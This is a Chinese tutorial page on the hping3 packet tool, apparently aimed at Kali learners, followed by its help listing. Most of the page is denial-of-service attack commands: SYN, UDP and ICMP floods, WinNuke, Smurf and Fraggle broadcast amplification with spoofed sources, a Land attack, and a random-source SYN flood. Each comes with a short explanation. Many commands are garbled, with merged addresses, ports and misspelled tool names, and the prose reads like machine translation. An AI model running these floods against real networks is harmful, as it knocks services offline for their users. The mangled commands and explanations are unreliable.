首页 > 编程知识 正文

kali教程,kali自学教程

时间:2023-05-05 02:32:19 阅读:10085 作者:4556

Hping百度百科

Hping是命令行中使用的TCP/IP包组装/分析工具,命令模式类似于Unix上的ping命令,但不仅仅可以发送ICMP响应请求,还可以发送TCP、UDP、ICMP和原始IP协议它还具有在两个相互包含的通道之间传输文件的路由跟踪模式。 Hping常用于网络和主机发现,其功能非常强大,可在各种操作系统(如Linux、FreeBSD、NetBSD、OpenBSD、Solaris、MacOs X和Windows )上运行

DOS攻击

1.tcp syn flood攻击

sudo hping 3192.168.200.1-p631-p-- flood

2.Udp流量攻击

sudo hping 3192.168.200.1-p631-s-- flood-2

3.icmp流量攻击

sudo hping 3192.168.200.1-p631-s-- flood-1

4.winnuke攻击

sudo hping3 -U 192.168.200.1 -p 139

注意事项: winnuke攻击端口不仅有139个,还有“138、137、113、53”等端口。

因此,必须小心测试以覆盖所有端口。 重要的是,winnuke攻击的特征是“flag=URG”。

因此,无法将端口检测为特征。

5.smurf攻击

HP3-1- a 192.168.0.1192.168.0.255

一种简单的Smurf攻击原理是通过使用将回复地址设置为受害网络广播地址的ICMP响应请求(ping )分组淹没受害主机。 最终,此网络中的所有主机都会响应此ICMP响应请求,并阻止网络。 它比深度洪水流量高一两个数量级。 更复杂的Smurf将源地址改为第三方受害者,最终第三方崩溃。

第二是复杂点的攻击,冒充攻击的地址向攻击的地址的广播地址,例如:发送信息

# HP3-1- a 192.168.0.1192.168.0.255

Fraggle攻击从smurf的ICMP协议攻击更改为UDP协议攻击,因此仅需要修改一个

个参数即可,所以将“-1”变更为“-2”。 (UTM实现了典型的端口7模式: HP3-2192.168.0.255-D7 ) ) ) ) ) )。

6 .陆地攻击

Sudo HPing3- s-a 192.168.200.1-p 3389 (正在侦听的端口号) 192.168.200.1

注意: Land攻击是指伪装成攻击的地址将请求信息发送到攻击的地址自身

sudo hping3- s-p135flood-v-- rand-source 192.168.1.1http://www.Sina.com/http://www.Sina.com /

usage : hping 3主机[ options ]

- h--帮助显示how this help

- v--版本显示版本

- c--计数包计数

- I--间隔等待(uxforxmicroseconds,for example -i u1000 ) ) ) )。

fastaliasfor-iu 10000 (10包tsforsecond ) )。

fasteraliasfor-I u1000 (100包tsforsecond )。

floodsentpacketsasfastaspossible.don’tshowreplies。

- n--数字数字输出

-q --quiet quiet

- I--接口接口名称(以太网接口路由接口)。

- v-- Verbose Verbose模式

- d--调试调试信息

- z-- bindbindctrlztottl (默认todstport ) )。

-Z --unbind unbind ctrl z

beepbeepforeverymatchingpacketreceived

模式

默认模式TCP

-0- -原始IP原始IP模式

-1--icmp icmp模式

-2--UDP UDP模式

-8- -扫描扫描模式。

example : hping---- scan1- 30,70-90-swww.target.host

-9- -监听器模式

r> IP
-a --spoof spoof source address
–rand-dest random destionation address mode. see the man.
–rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don’t fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
–lsrr loose source routing and record route
–ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
–force-icmp send all icmp types (default send only supported types)
–icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
–icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
–icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
–icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you’ll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
–tcpexitcode use last tcp->th_flags as exit code
–tcp-mss enable the TCP MSS option with the given value
–tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add ‘signature’
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable ‘safe’ protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
–tr-stop Exit when receive the first not ICMP in traceroute mode
–tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
–tr-no-rtt Don’t calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
–apd-send Send the packet described with APD (see docs/APD.txt)

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。